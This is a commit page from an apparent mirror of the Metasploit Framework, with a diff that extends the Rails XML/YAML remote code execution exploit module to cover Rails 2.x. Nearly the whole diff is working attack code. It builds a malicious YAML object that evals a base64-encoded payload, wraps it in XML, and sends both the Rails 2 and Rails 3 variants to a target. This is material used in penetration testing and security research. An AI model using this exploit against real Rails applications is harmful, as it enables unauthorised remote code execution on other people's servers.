infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge in Rails2 support now that its in master

bug/bundler_fix
HD Moore 2013-01-10 02:14:08 -06:00
parent bf013ba65f
commit 42ea64c21b
1 changed files with 34 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
View File

@ -22,9 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
an attacker to instantiate a remote object, which in turn can be used to execute an attacker to instantiate a remote object, which in turn can be used to execute
any ruby code remotely in the context of the application. any ruby code remotely in the context of the application.
This module has been tested across multiple versions of RoR 3.x, but does not yet This module has been tested across multiple versions of RoR 3.x and RoR 2.x
work against 2.x versions of RoR.
}, },
'Author' => 'Author' =>
[ [
@ -85,7 +83,25 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Create the YAML document that will be embedded into the XML # Create the YAML document that will be embedded into the XML
# #
def build_yaml def build_yaml_rails2
# Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
"eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
yaml
end
#
# Create the YAML document that will be embedded into the XML
#
def build_yaml_rails3
# Embed the payload with the detached stub # Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
@ -101,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Create the XML wrapper with any desired evasion # Create the XML wrapper with any desired evasion
# #
def build_request def build_request(v)
xml = '' xml = ''
elo = Rex::Text.rand_text_alpha(rand(12)+4) elo = Rex::Text.rand_text_alpha(rand(12)+4)
@ -120,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
el = Rex::Text.rand_text_alpha(rand(12)+4) el = Rex::Text.rand_text_alpha(rand(12)+4)
xml << "<#{el} type='yaml'>" xml << "<#{el} type='yaml'>"
xml << build_yaml xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
xml << "</#{el}>" xml << "</#{el}>"
if datastore['XML::PadElement'] if datastore['XML::PadElement']
@ -142,13 +158,22 @@ class Metasploit3 < Msf::Exploit::Remote
# Send the actual request # Send the actual request
# #
def exploit def exploit
data = build_request
print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...") print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/", 'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'], 'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml', 'ctype' => 'application/xml',
'data' => data, 'data' => build_request(3)
}, 25)
handler
print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'data' => build_request(2)
}, 25) }, 25)
handler handler
end end